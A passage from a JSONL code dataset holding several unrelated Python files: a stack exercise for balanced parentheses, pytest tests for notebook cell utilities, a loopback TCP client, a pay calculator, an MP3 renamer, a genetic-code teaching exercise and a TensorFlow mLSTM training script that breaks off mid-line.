stack.append(-1)\n# if sum(stack) == 0:\n# print(\"YES\")\n# else:\n# print(\"NO\")\n\n#pop으로 해야함\n\nt = int(input())\nfor _ in range(t):\n stack = []\n vps = list(input())\n for s in vps:\n if s == \"(\":\n stack.append(0)\n elif s == \")\":\n if stack:\n del stack[-1]\n else:\n stack.append(-1)\n break\n if len(stack) == 0:\n print(\"YES\")\n else:\n print(\"NO\")\n","sub_path":"Python/DAYOUNG/17_스택/3_괄호.py","file_name":"3_괄호.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"43169925","text":"import pytest\n\nfrom nb2report.cell_utils import *\n\n\ndef test_assert_is_cell():\n cell1 = {'cell_type': 'whatever', 'source': ['whatever']}\n cell2 = {'cell_type': 'whatever', 'source': ['whatever'], 'a': 2}\n cell3 = {'cell_type': 'whatever', 'source': ['whatever', 'w2']}\n\n assert assert_cell(cell1) is True\n assert assert_cell(cell2) is True\n assert assert_cell(cell3) is True\n\n\n@pytest.mark.xfail(raises=AssertionError)\ndef test_not_assert_is_cell():\n cell4 = {'cell_type': 'whatever', 'source': 'whatever'}\n cell5 = {'cell_type': 2, 'source': ['whatever']}\n cell6 = {'source': ['whatever']}\n cell7 = {'cell_type': 'whatever'}\n\n assert assert_cell(cell4) is False\n assert assert_cell(cell5) is False\n assert assert_cell(cell6) is False\n assert assert_cell(cell7) is False\n\n\ndef test_is_assert():\n cell1 = {'cell_type': 'whatever', 'source': '# asserts'}\n cell2 = {'cell_type': 'whatever', 'source': '# AssertS'}\n cell3 = {'cell_type': 'whatever', 'source': '--_-# assertsaaaA'}\n cell4 = {'cell_type': 'whatever', 'source': '--_-# AsSErtsaaaA'}\n cell5 = {'cell_type': 'whatever', 'source': '# '}\n cell6 = {'cell_type': 'whatever', 'source': ''}\n cell7 = {'cell_type': 'whatever', 'source': 'gsfdgsa'}\n\n assert is_assert(cell1) is True\n assert is_assert(cell2) is True\n assert is_assert(cell3) is True\n assert is_assert(cell4) is True\n assert is_assert(cell5) is False\n assert is_assert(cell6) is False\n assert is_assert(cell7) is False\n\n\ndef test_is_list():\n assert is_list({\n 'cell_type': 'markdown',\n 'source': [\"*\"]\n }) is True\n\n assert is_list({\n 'cell_type': 'markdown',\n 'source': [\"0\"]\n }) is False\n\n assert is_list({\n 'cell_type': 'markdown',\n 'source': [\"\"]\n }) is False\n\n\ndef test_is_title():\n assert is_title({\n 'cell_type': 'markdown',\n 'source': [\"#\"]\n }) is True\n\n assert is_title({\n 'cell_type': 'markdown',\n 'source': [\"_\"]\n }) is False\n\n assert is_title({\n 'cell_type': 'markdown',\n 'source': [\"\"]\n }) is False\n\n\ndef test_is_markdown():\n cell1 = {'cell_type': 'markdown', 'source': ['whatever']}\n cell2 = {'cell_type': 'marKdown', 'source': ['whatever']}\n cell3 = {'cell_type': '', 'source': ['whatever']}\n\n assert is_markdown(cell1) is True\n assert is_markdown(cell2) is False\n assert is_markdown(cell3) is False\n\n\ndef test_is_code():\n cell1 = {'cell_type': 'code', 'source': ['whatever']}\n cell2 = {'cell_type': 'coDe', 'source': ['whatever']}\n cell3 = {'cell_type': '', 'source': ['whatever']}\n\n assert is_code(cell1) is True\n assert is_code(cell2) is False\n assert is_code(cell3) is False\n\n\ndef test_get_first_line():\n cell = {'cell_type': 'code', 'source': ['whatever', 'no']}\n\n assert get_first_line(cell) == 'whatever'\n\n\ndef test_get_output():\n cell1 = {\n 'cell_type': 'code',\n 'execution_count': 3,\n 'metadata': {},\n 'outputs': [\n {'data': {'text/plain': 'True'},\n 'execution_count': 3,\n 'metadata': {},\n 'output_type': 'execute_result'}\n ],\n 'source': ['True == True']\n }\n\n cell2 = {\n 'cell_type': 'code',\n 'execution_count': 3,\n 'metadata': {},\n 'outputs': [],\n 'source': ['True == True']\n }\n\n assert get_output(cell1) == 'True'\n assert get_output(cell2) == 'False'\n","sub_path":"tests/test_cell_utils.py","file_name":"test_cell_utils.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"324504357","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTCP Client Example\n\nCopyright (c) 2017 - Michael Kessel (mailto: the.rocketredneck@gmail.com)\na.k.a. RocketRedNeck, RocketRedNeck.com, RocketRedNeck.net \n\nRocketRedNeck and MIT Licenses \n\nRocketRedNeck hereby grants license for others to copy and modify this source code for \nwhatever purpose other's deem worthy as long as RocketRedNeck is given credit where \nwhere credit is due and you leave RocketRedNeck out of it for all other nefarious purposes. \n\nPermission is hereby granted, free of charge, to any person obtaining a copy \nof this software and associated documentation files (the \"Software\"), to deal \nin the Software without restriction, including without limitation the rights \nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell \ncopies of the Software, and to permit persons to whom the Software is \nfurnished to do so, subject to the following conditions: \n\nThe above copyright notice and this permission notice shall be included in all \ncopies or substantial portions of the Software. \n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR \nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE \nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER \nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, \nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE \nSOFTWARE. \n****************************************************************************************************\n\"\"\"\nimport argparse\nimport socket\nimport time\n\ndefault_ipaddr = '127.0.0.1' # loopback\ndefault_port = 54321\ndefault_rcvsize = 48*1024\n\nparser = argparse.ArgumentParser(description='UDP Receiver Example')\nparser.add_argument('--addr', \n default=default_ipaddr,\n type=str, \n help=f'Interface Address (default={default_ipaddr})')\nparser.add_argument('--port',\n default=default_port,\n type=int, \n help=f'Receiving Port (default={default_port})')\nparser.add_argument('--size',\n default=default_rcvsize,\n\t\t\t\t\ttype=int,\n\t\t\t\t\thelp=f'Socket Receive Size (default={default_rcvsize})')\nparser.add_argument('--delay',\n default=0,\n type=float, \n help=f'delay (busy wait) every --delaymod frames (default = 0)')\nparser.add_argument('--delaymod',\n default=1,\n type=int, \n help=f'modulo when to apply --delay when delay > 0 (default = 1)')\n\nargs = parser.parse_args()\n\nIF_ADDR = args.addr\nPORT = args.port\n\ndef find(s, ch):\n return [i for i, ltr in enumerate(s) if ltr == ch]\n\nwhile (True):\n connectionSocket = socket.socket(family=socket.AF_INET,\n type=socket.SOCK_STREAM,\n proto=socket.IPPROTO_TCP)\n \n if (connectionSocket == None):\n print(\"Unable to create listen socket\")\n break\n \n print(\"Waiting for server...\")\n \n try:\n connectionSocket.connect((IF_ADDR, PORT))\n connectionSocket.settimeout(1.0)\n #connectionSocket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, args.size)\n #print(connectionSocket.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF))\n \n print(\"Connected!\")\n \n connectionSocket.send(b'Go')\n \n prefix_data = ''\n count = 0\n lostcount = 0\n\n starttime_sec = time.time()\n lasttime_sec = starttime_sec\n nexttime_sec = starttime_sec + 1.0\n lastcount = 0\n avgips = 0.0\n lasttermtime_sec = 0.0\n\n display = False\n\n while (True):\n try:\n data = connectionSocket.recv(args.size)\n data = prefix_data + data.decode(\"utf-8\")\n if (data == ''):\n break\n \n # because the data is a stream of information\n # we must parse it outselves\n # In this example we are using the '*' character\n # as a delimiter\n terminators = find(data,'*')\n\n # If the last byte is not '*' then we need to hold\n # the remaining data for prepending the next part\n # of the stream\n if terminators != []:\n lasttermtime_sec = time.time()\n if data[-1] != '*':\n # Strip trailing data for next receive frame\n prefix_data = data[terminators[-1]+1:]\n data = data[:terminators[-1]+1]\n\n starts = [0] + [x+1 for x in terminators[:-1]]\n for i in range(len(starts)):\n bang = data[starts[i]:].find('!')\n msg = data[starts[i]:starts[i]+bang]\n if (msg is ''):\n break\n gt = msg.find('<')\n sn = int(msg[:gt])\n count = count + 1\n\n now_sec = time.time()\n if (now_sec >= nexttime_sec):\n nexttime_sec += 1.0\n \n dt = now_sec - lasttime_sec\n lasttime_sec = now_sec\n if (dt > 0.0):\n avgips = float(count - lastcount)/dt\n else:\n avgips = 0.0\n lastcount = count\n\n display = True\n\n if count == 1:\n lastsn = sn\n elif lastsn != sn - 1:\n #print(\" SKIP DETECTED!!!\")\n lostcount += (sn - lastsn - 1)\n\n if display:\n display = False\n print(f'{sn} <----- : lost = {lostcount} ({100*lostcount/sn:3.0f} %) : ({avgips:6.0f} Hz)')\n lastsn = sn\n else:\n if (time.time() - lasttermtime_sec >= 1.0):\n print(\"Timeout...\")\n break\n else:\n # Keep waiting for more data until terminator seen (indicating we have a complete 'message')\n prefix_data = data\n \n except socket.timeout:\n print(\"Timeout...\")\n except Exception as e:\n print(e)\n break\n \n except Exception as e:\n print(e)\n\n connectionSocket.close()\n \n \n \n \n \n ","sub_path":"TCP_ClientExample.py","file_name":"TCP_ClientExample.py","file_ext":"py","file_size_in_byte":6922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"648719459","text":"def computepay(hours, rate):\n #print('In computepay', hours, rate)\n if hours>40:\n print('Overtime')\n reg=rate*hours\n otp=(hours-40)*(rate*.5)\n pay=otp+reg\n else:\n print('Regular')\n pay=hours*rate\n return pay\n\nsh=input('Enter Hours:')\nsr=input('Enter Rate:')\nfh=float(sh)\nfr=float(sr)\n#print(fh, fr)\nxp=computepay (fh,fr)\n\nprint ('Pay:',xp)\n","sub_path":"py4e/ex.04.06/ex.04.06.py","file_name":"ex.04.06.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"142196845","text":"# -*- coding: utf-8 -*-\n\n'''\nCreated on Apr 20, 2015\n\n@author: boldkhuu\n'''\nimport os\nimport sys\nimport argparse\nfrom mutagen.mp3 import EasyMP3\n\n\nOPTIONS = {\n 'help': '--help',\n 'rename': '--rename'\n}\n\nALLOWED_EXTENSIONS = ['.mp3']\n\n\ndef main(argv):\n try:\n dispatcher(argv)\n except KeyboardInterrupt:\n print('Program stopped by the user.')\n\n\ndef dispatcher(argv):\n parser = argparse.ArgumentParser()\n\n # Arguments\n parser.add_argument('-r', '--rename',\n type=str, nargs='+', metavar='directory',\n help='rename mp3 files in these folders')\n\n args = parser.parse_args()\n if args.rename:\n renameFilesInFolder(args.rename)\n\n\ndef renameFilesInFolder(directories):\n for directory in directories:\n if not os.path.exists(directory):\n print(\"ERROR: {}: directory doesn't exist.\".format(directory))\n continue\n for root, subdirs, files in os.walk(directory.decode('utf-8')):\n for file in files:\n extension = os.path.splitext(file)[1]\n if extension in ALLOWED_EXTENSIONS:\n path = os.path.join(root, file)\n audio = EasyMP3(path)\n\n artist = audio['artist'][0]\n number = audio['tracknumber'][0].split('/')[0]\n if len(number) == 1:\n number = '0{}'.format(number)\n title = audio['title'][0]\n\n filename = u\"{} - {} - {}{}\".format(\n number, artist, title, extension)\n newPath = os.path.join(root, filename)\n\n os.rename(path, newPath)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"organize.py","file_name":"organize.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"131072939","text":"'''\nBCBGSO Basic Python workshop 3/23/2018\nExercise 2\n\n@author urmi\n'''\n\n\n#Don't change this\ncodons=['TTT','TTG','CTC','ATT','ATG','GTA','TAC','TAA','TAG','CAT','CAC','CAA','AAC','AAG','GAT','TGC','TGA','TGG','CGA','AGC','AGG','GGG','YYPQ','SDEH','PSDL']\n'''\nA codon is fundamental unit of the genetic code, defined as sequence of three nucleotides\nGiven above, \"codons\" is a list containg some of the 64 total codons.\nFor the following questions change the list using your code and not by editing the list declaration\n'''\n#1. The last three elements in the list are not codons. Remove these from the codon list\n\n#2. Add the codons 'GGT', 'TTC' and 'TTA' to the list\n\n#3. How many codons are there in the list\n\n#Don't change this\npeptide='MEEPQSDPSVEPPLSQETFSDLWKLLPENNVLSPLPSQAMDDLMLSPDDIEQWFTEDPGPDEAPRMPEAAPPVAPAPAAPTPAAPAPAPSWPLSSSVPSQKTYQGSYGFRLGFLHSGTAKSVTCTYSPALNKMFCQLAKTCPVQLWVDSTPPPGTRVRAMAIYKQSQHMTEVVRRCPHHERCSDSDGLAPPQHLIRVEGNLRVEYLDDRNTFRHSVVVPYEPPEVGSDCTTIHYNYMCNSSCMGGMNRRPILTIITLEDSSGNLLGRNSFEVRVCACPGRDRRTEEENLRKKGEPHHELPPGSTKRALPNNTSSSPQPKKKPLDGEYFTLQDQTSFQKENC'\n'''\nA protein sequence is written by writing individual amino acids,represented by single letters, in a particular order.\nThe variable \"peptide\" contains the protein sequence for the human tumor protein p53. This protein acts as a tumor suppressor by regulating cell division.\n'''\n\n#4. Find out how many unique amino acids are present in the human tumor protein p53. Hint use set()\n\n\n#Don't change this\n#Thanks Yuan Wang, BCB for the dict code\ngeneticCode = {\"UUU\":\"F\", \"UUC\":\"F\", \"UUA\":\"L\", \"UUG\":\"L\",\n \"UCU\":\"S\", \"UCC\":\"s\", \"UCA\":\"S\", \"UCG\":\"S\",\n \"UAU\":\"Y\", \"UAC\":\"Y\", \"UAG\":\"STOP\",\n \"UGU\":\"C\", \"UGC\":\"C\", \"UGA\":\"STOP\", \"UGG\":\"W\",\n \"CUU\":\"L\", \"CUC\":\"L\", \"CUA\":\"L\", \"CUG\":\"L\",\n \"CCU\":\"P\", \"CCC\":\"P\", \"CCA\":\"P\", \"CCG\":\"P\",\n \"CAU\":\"H\", \"CAC\":\"H\", \"CAA\":\"Q\", \"CAG\":\"Q\",\n \"CGU\":\"R\", \"CGC\":\"R\", \"CGA\":\"R\", \"CGG\":\"R\",\n \"AUU\":\"I\", \"AUC\":\"I\", \"AUA\":\"I\", \"AUG\":\"M\",\n \"ACU\":\"T\", \"ACC\":\"T\", \"ACA\":\"T\", \"ACG\":\"T\",\n \"AAU\":\"N\", \"AAC\":\"N\", \"AAA\":\"K\", \"AAG\":\"K\",\n \"AGU\":\"S\", \"AGC\":\"S\", \"AGA\":\"R\", \"AGG\":\"R\",\n \"GUU\":\"V\", \"GUC\":\"V\", \"GUA\":\"V\", \"GUG\":\"V\",\n \"GCU\":\"A\", \"GCC\":\"A\", \"GCA\":\"A\", \"GCG\":\"A\",\n \"GAU\":\"D\", \"GAC\":\"D\", \"GAA\":\"E\", \"GAG\":\"E\",\n \"GGU\":\"G\", \"GGC\":\"G\", \"GGA\":\"G\", }\n\n'''\nAbove \"geneticCode\" is a dict which maps an RNA codon to an amino acid letter.\n'''\n\n#5. Print how many entries are the in the dict\n\n#6. For the sequence AUG GGU GGC AAA CUA UAG UCG CGG UGA print the coressponding amino acid sequence (on a single line, without spaces), using the above defined geneticCode.\n\n","sub_path":"exercises/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"355394325","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os\nimport sys\nimport numpy as np\nimport argparse\nimport random\nimport tensorflow as tf\nimport pprint\nimport time\nimport io\nfrom Utilities import DataLoader\nimport caffeine\n\n\nparser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--data_dir', type=str, default=None,\n help='Path to training data directory') # not optional\nparser.add_argument('--saved_models_dir', type=str, default='saved_models',\n help='Name of directory to save models during training')\nparser.add_argument('--log_dir', type=str, default='tensorboard_logs',\n help='Name of directory for storing tensorboard logs')\nparser.add_argument('--rnn_size', type=int, default=128,\n help='Size of RNN hidden states')\nparser.add_argument('--batch_size', type=int, default=32,\n help='RNN minibatch size')\nparser.add_argument('--seq_length', type=int, default=32,\n help='RNN sequence length')\nparser.add_argument('--num_epochs', type=int, default=1,\n help='Number of training epochs')\nparser.add_argument('--init_lr', type=float, default=5*10**-4, # value from paper\n help='Initial learning rate')\nparser.add_argument('--embedding_size', type=int, default=64,\n help='Character embedding layer size')\nparser.add_argument('--wn', type=int, default=1,\n help='Switch for weight normalisation on the mLSTM parameters. Integer argument of 1 for ON and 0 for OFF')\nparser.add_argument('--restore_path', type= str, default=None,\n help='Path to a directory from which to restore a model from previous session')\nparser.add_argument('--summary_frequency', type=int, default=100,\n help='Save tensorboard data every N steps')\nparser.add_argument('--sampling_frequency', type=int, default=100,\n help='Generate samples from the model during training every N steps ')\nparser.add_argument('--num_chars', type=int, default=250,\n help='Option to specify how many chars to sample from the model if --sampling_frequency is not zero ')\nparser.add_argument('--lr_decay', type=int, default=1,\n help='Switch for learning rate decay. Integer argument of 1 for ON and 0 for OFF, learning rate is decayed to zero over the total number of updates')\nparser.add_argument('--np_path', type=str, default=None,\n help='Path to directory of numpy weights to restore model from')\n\nargs = parser.parse_args()\n\nrnn_size = args.rnn_size\nbatch_size = args.batch_size\nseq_length = args.seq_length\nembedding_size = args.embedding_size\n\n# preprocess the input data and create batches\ndata_dir =args.data_dir\n\nloader = DataLoader(data_dir, batch_size, seq_length)\n\nvocabulary_size = 256 # byte\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n\n \n #-----------------------------------------------------------------------------\n # restore from numpy weights\n if args.np_path is not None:\n # read in from the 15 numpy weights files\n params = [np.load(args.np_path + '/%d.npy'%i) for i in range(15)]\n wx = np.split(params[1], 4, 1)\n b = np.split(params[8], 4)\n gx = np.split(params[9], 4)\n gm = np.split(params[10], 4)\n\n # Load weights into variables\n W_embedding = tf.get_variable(\"W_embedding\", initializer=tf.constant(params[0]))\n\n Wmx = tf.get_variable(\"Wmx\", initializer=tf.constant(params[6]))\n Wmh = tf.get_variable(\"Wmh\", initializer=tf.constant(params[7]))\n \n Whx = tf.get_variable(\"Whx\", initializer=tf.constant(wx[3]))\n Whm = tf.get_variable(\"Whm\", initializer=tf.constant(params[5]))\n Whb = tf.get_variable(\"Whb\", initializer=tf.constant(np.expand_dims(b[3], axis=0)))\n\n Wix = tf.get_variable(\"Wix\", initializer=tf.constant(wx[0]))\n Wim = tf.get_variable(\"Wim\", initializer=tf.constant(params[2]))\n Wib = tf.get_variable(\"Wib\", initializer=tf.constant(np.expand_dims(b[0], axis=0)))\n\n Wox = tf.get_variable(\"Wox\", initializer=tf.constant(wx[2]))\n Wom = tf.get_variable(\"Wom\", initializer=tf.constant(params[4]))\n Wob = tf.get_variable(\"Wob\", initializer=tf.constant(np.expand_dims(b[2], axis=0)))\n\n Wfx = tf.get_variable(\"Wfx\", initializer=tf.constant(wx[1]))\n Wfm = tf.get_variable(\"Wfm\", initializer=tf.constant(params[3]))\n Wfb = tf.get_variable(\"Wfb\", initializer=tf.constant(np.expand_dims(b[1], axis=0)))\n\n gmx = tf.get_variable(\"gmx\", initializer=tf.constant(params[11]))\n gmh = tf.get_variable(\"gmh\", initializer=tf.constant(params[12]))\n\n ghx = tf.get_variable(\"ghx\", initializer=tf.constant(gx[3]))\n ghm = tf.get_variable(\"ghm\", initializer=tf.constant(gm[3]))\n\n gix = tf.get_variable(\"gix\", initializer=tf.constant(gx[0]))\n gim = tf.get_variable(\"gim\", initializer=tf.constant(gm[0]))\n\n gox = tf.get_variable(\"gox\", initializer=tf.constant(gx[2]))\n gom = tf.get_variable(\"gom\", initializer=tf.constant(gm[2]))\n\n gfx = tf.get_variable(\"gfx\", initializer=tf.constant(gx[1]))\n gfm = tf.get_variable(\"gfm\", initializer=tf.constant(gm[1])) \n\n Classifier_w = tf.get_variable(\"Classifier_w\", initializer=tf.constant(params[13]))\n Classifier_b = tf.get_variable(\"Classifier_b\", initializer=tf.constant(params[14])) \n\n pprint.pprint([W_embedding, Wmx, Wmh, Whx, Whm, Whb, Wix, Wim, Wib, Wox, Wom, Wob, \n Wfx, Wfm, Wfb, gmx, gmh, ghx, ghm, gix, gim, gox, gom, gfx, gfm, Classifier_w, Classifier_b] )\n\n print('Restored from Numpy weights at: ', args.np_path)\n #-----------------------------------------------------------------------------\n else:\n # weight matrix for character embedding\n W_embedding = tf.Variable(tf.truncated_normal([vocabulary_size, embedding_size], -0.1, 0.1),name = 'W_embedding')\n\n # mt = (Wmxxt) ⊙ (Wmhht−1) - equation 18\n Wmx = tf.Variable(tf.truncated_normal([embedding_size, rnn_size], -0.1, 0.1),name = 'Wmx')\n Wmh = tf.Variable(tf.truncated_normal([rnn_size, rnn_size], -0.1, 0.1), name = 'Wmh')\n\n # hˆt = Whxxt + Whmmt\n Whx = tf.Variable(tf.truncated_normal([embedding_size, rnn_size], -0.1, 0.1),name = 'Whx')\n Whm = tf.Variable(tf.truncated_normal([rnn_size, rnn_size], -0.1, 0.1),name = 'Whm')\n Whb = tf.Variable(tf.zeros([1, rnn_size]),name = 'Whb')\n\n # it = σ(Wixxt + Wimmt)\n Wix = tf.Variable(tf.truncated_normal([embedding_size, rnn_size], -0.1, 0.1),name = 'Wix')\n Wim = tf.Variable(tf.truncated_normal([rnn_size, rnn_size], -0.1, 0.1),name = 'Wim')\n Wib = tf.Variable(tf.zeros([1, rnn_size]),name = 'Wib')\n\n # ot = σ(Woxxt + Wommt)\n Wox = tf.Variable(tf.truncated_normal([embedding_size, rnn_size], -0.1, 0.1),name = 'Wox')\n Wom = tf.Variable(tf.truncated_normal([rnn_size, rnn_size], -0.1, 0.1),name = 'Wom')\n Wob = tf.Variable(tf.zeros([1, rnn_size]),name = 'Wob')\n\n # ft =σ(Wfxxt +Wfmmt)\n Wfx = tf.Variable(tf.truncated_normal([embedding_size, rnn_size], -0.1, 0.1),name = 'Wfx')# Wox\n Wfm = tf.Variable(tf.truncated_normal([rnn_size, rnn_size], -0.1, 0.1),name = 'Wfm')# Woh\n Wfb = tf.Variable(tf.zeros([1, rnn_size]),name = 'Wfb')\n\n # define the g parameters for weight normalization if wn switch is on\n if args.wn == 1:\n\n gmx = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gmx')\n gmh = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gmh')\n\n ghx = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='ghx')\n ghm = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='ghm')\n\n gix = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gix')\n gim = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gim')\n\n gox = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gox')\n gom = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gom')\n\n gfx = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gfx')\n gfm = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gfm')\n\n\n # normalized weights\n Wmx = tf.nn.l2_normalize(Wmx, dim=0)*gmx\n Wmh = tf.nn.l2_normalize(Wmh, dim=0)*gmh\n\n Whx = tf.nn.l2_normalize(Whx,dim=0)*ghx\n Whm = tf.nn.l2_normalize(Whm,dim=0)*ghm\n\n Wix = tf.nn.l2_normalize(Wix,dim=0)*gix\n Wim = tf.nn.l2_normalize(Wim,dim=0)*gim\n\n Wox = tf.nn.l2_normalize(Wox,dim=0)*gox\n Wom = tf.nn.l2_normalize(Wom,dim=0)*gom\n\n Wfx = tf.nn.l2_normalize(Wfx,dim=0)*gfx\n Wfm = tf.nn.l2_normalize(Wfm,dim=0)*gfm\n\n # Classifier weights and biases.\n Classifier_w = tf.Variable(tf.truncated_normal([rnn_size, vocabulary_size], -0.1, 0.1),name='Classifier_w')\n Classifier_b = tf.Variable(tf.zeros([vocabulary_size]),name='Classifier_b')\n\n\n # Variables for saving state across unrolled network.\n saved_output = tf.Variable(tf.zeros([batch_size, rnn_size]),name='saved_output', trainable=False)\n saved_state = tf.Variable(tf.zeros([batch_size, rnn_size]),name='saved_state', trainable=False)\n\n # placeholder for the inputs and the targets\n inputs = tf.placeholder(tf.int32, shape=[batch_size, seq_length],name='inputs')\n targets = tf.placeholder(tf.int32, shape=[batch_size, seq_length],name='targets') # targets for the lm\n\n # for the targets\n one_hot_labels = tf.one_hot(targets, vocabulary_size)\n labels_split_ = tf.split(one_hot_labels, seq_length, axis=1)\n list_labels = [tf.squeeze(input_, [1]) for input_ in labels_split_]\n\n # for the inputs\n embedded_inputs = tf.nn.embedding_lookup(W_embedding,inputs)\n inputs_split_ = tf.split(embedded_inputs, seq_length, axis=1)\n list_inputs = [tf.squeeze(input_, [1]) for input_ in inputs_split_]\n\n def mlstm_cell(x, h, c):\n \"\"\"\n multiplicative LSTM cell. https://arxiv.org/pdf/1609.07959.pdf\n\n \"\"\"\n # mt = (Wmxxt) ⊙ (Wmhht−1) - equation 18\n mt = tf.matmul(x,Wmx) * tf.matmul(h,Wmh)\n # hˆt = Whxxt + Whmmt\n ht = tf.tanh(tf.matmul(x,Whx) + tf.matmul(mt,Whm) + Whb)\n # it = σ(Wixxt + Wimmt)\n it = tf.sigmoid(tf.matmul(x,Wix) + tf.matmul(mt,Wim)+ Wib)\n # ot = σ(Woxxt + Wommt)\n ot = tf.sigmoid(tf.matmul(x,Wox) + tf.matmul(mt,Wom)+ Wob)\n # ft =σ(Wfxxt +Wfmmt)\n ft = tf.sigmoid(tf.matmul(x,Wfx) + tf.matmul(mt,Wfm)+ Wfb)\n\n c_new = (ft * c) + (it * ht)\n \n\n h_new = tf.tanh(c_new) * ot\n\n return h_new, c_new\n\n # Unrolled LSTM loop.\n outputs = list()\n output = saved_output # these are initially zero\n state = saved_state\n for i in list_inputs:\n output, state = mlstm_cell(i, output, state)\n outputs.append(output)\n\n with tf.control_dependencies([saved_output.assign(output), saved_state.assign(state)]):\n # Classifier.\n logits = tf.nn.xw_plus_b(tf.concat(outputs, 0), Classifier_w, Classifier_b)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=tf.concat(list_labels, 0), logits=logits),name='loss')\n perplexity = tf.exp(loss)\n\n # Optimizer.\n global_step = tf.Variable(0, name='global_step', trainable=False)\n learning_rate = tf.placeholder(tf.float32, shape=[])\n init_lr = args.init_lr\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n gradients, v = zip(*optimizer.compute_gradients(loss))\n optimizer = optimizer.apply_gradients(zip(gradients, v), global_step=global_step, name= 'optimizer_op')\n\n # Predictions.\n train_prediction = tf.nn.softmax(logits)\n\n # Sampling code.\n sample_input = tf.placeholder(tf.int32, shape=(1,), name = 'sample_input')\n sample_embedding= tf.nn.embedding_lookup(W_embedding,sample_input)\n saved_sample_output = tf.Variable(tf.zeros([1, rnn_size]),name = 'saved_sample_output')\n saved_sample_state = tf.Variable(tf.zeros([1, rnn_size]),name = 'saved_sample_state')\n\n reset_sample_state = tf.group(saved_sample_output.assign(tf.zeros([1, rnn_size])), saved_sample_state.assign(tf.zeros([1, rnn_size])),name='reset_sample_state_op')\n\n sample_output, sample_state = mlstm_cell(sample_embedding, saved_sample_output, saved_sample_state)\n\n with tf.control_dependencies([saved_sample_output.assign(sample_output),saved_sample_state.assign(sample_state)]):\n sample_prediction = tf.nn.softmax(tf.nn.xw_plus_b(sample_output, Classifier_w, Classifier_b), name = 'sample_prediction')\n\n# Summaries for tensorboard\ntf.summary.scalar('train_loss', loss)\ntf.summary.scalar('perplexity', perplexity)\ntf.summary.scalar('learning_rate', learning_rate)\n\nwith tf.Session(graph=graph) as session:\n\n saver = tf.train.Saver()\n\n # initialize variables before restoring from saved model\n tf.global_variables_initializer().run()\n print('Variables Initialized')\n\n # restore from model file\n if args.restore_path is not None:\n saver.restore(session, tf.train.latest_checkpoint(args.restore_path))\n print('Restored from model dir: ', args.restore_path)\n \n summaries = tf.summary.merge_all()\n print('Summaries Merged')\n\n # timestamp for saving the run\n timestamp = time.strftime(\"%Y-%m-%d-%H-%M-%S\")\n\n # writer for saving tensorboard logs\n writer = tf.summary.FileWriter(os.path.join(args.log_dir, timestamp))\n writer.add_graph(session.graph)\n\n for epoch in xrange(args.num_epochs):\n\n loader.reset_batch_pointer()\n\n for batch in xrange(loader.num_batches):\n\n gs = session.run(global_step)\n start = time.time()\n x,y = loader.next_batch()\n\n if args.lr_decay == 1:\n\n lr = init_lr-(((gs)*init_lr)/loader.num_batches) # linearly decay the learning rate to zero over the number of updates\n\n _,l,perp,summary=session.run([optimizer, loss, perplexity, summaries], feed_dict={inputs:x, targets:y,learning_rate:lr})\n\n else:\n\n _,l,perp,summary=session.run([optimizer, loss, perplexity, summaries], feed_dict={inputs:x, targets:y,learning_rate:init_lr})\n\n end = time.time()\n\n print(\"Global step: {}, progress: ({}/{}), train_loss = {:.3f}, train_perplexity = {:.3f} time/batch = {:.3f}\"\n .format(gs,epoch * loader.num_batches + batch,args.num_epochs * loader.num_batches,l, perp, end - start))\n\n # write the summaries to the log_dir for tensorboard\n if args.summary_frequency != 0:\n if (batch % args.summary_frequency == 0):\n start = time.time()\n writer.add_summary(summary, gs)\n end = time.time()\n print('Writing Summaries...', 'time = ', end - start)\n\n # sample from the model\n if args.sampling_frequency !=0:\n\n if batch % args.sampling_frequency == 0:\n start = time.time()\n print('Sampling...')\n\n feed = np.array(random.sample(xrange(vocabulary_size),1), dtype='int32') # random seed\n sentence = unicode('')\n\n print('='*100)\n\n for _ in xrange(args.num_chars): # can change number of characters to sample here\n\n prediction = session.run(sample_prediction, feed_dict 